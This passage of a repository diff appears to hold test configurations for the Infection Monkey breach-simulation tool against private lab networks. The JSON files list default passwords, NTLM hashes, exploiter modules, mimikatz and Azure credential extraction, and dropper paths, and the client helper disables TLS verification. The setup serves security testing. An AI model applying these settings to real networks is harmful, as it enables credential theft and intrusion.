headers=self.get_jwt_header(),
params=data,
verify=False)
def post(self, url, data):
return requests.post(self.addr + url,
data=data,
headers=self.get_jwt_header(),
verify=False)
def post_json(self, url, dict_data):
return requests.post(self.addr + url,
json=dict_data,
headers=self.get_jwt_header(),
verify=False)
def get_jwt_header(self):
return {"Authorization": "JWT " + self.token}

View File

@ -0,0 +1,184 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.4",
"10.2.2.5"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"ElasticGroovyExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,186 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.3",
"10.2.2.2"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"HadoopExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [
"e1c0dc690821c13b10a41dccfc72e43a"
],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,183 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"Xk8VDTsC",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.16"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"MSSQLExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,183 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.8"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"ShellShockExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,182 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"Ivrrw5zEzs"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.14",
"10.2.2.15"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,180 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.15"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [ "f7e457346f7743daece17258667c936d" ],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,192 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"12345678",
"^NgDvY59~8"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.11",
"10.2.2.12"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,193 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.23",
"10.2.2.24"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,199 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"3Q=(Ge(+&w]*",
"`))jU7L(w}",
"12345678",
"another_one",
"and_another_one",
"one_more"
],
"exploit_user_list": [
"Administrator",
"rand",
"rand2",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 3,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.9",
"10.2.1.10",
"10.2.0.11"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
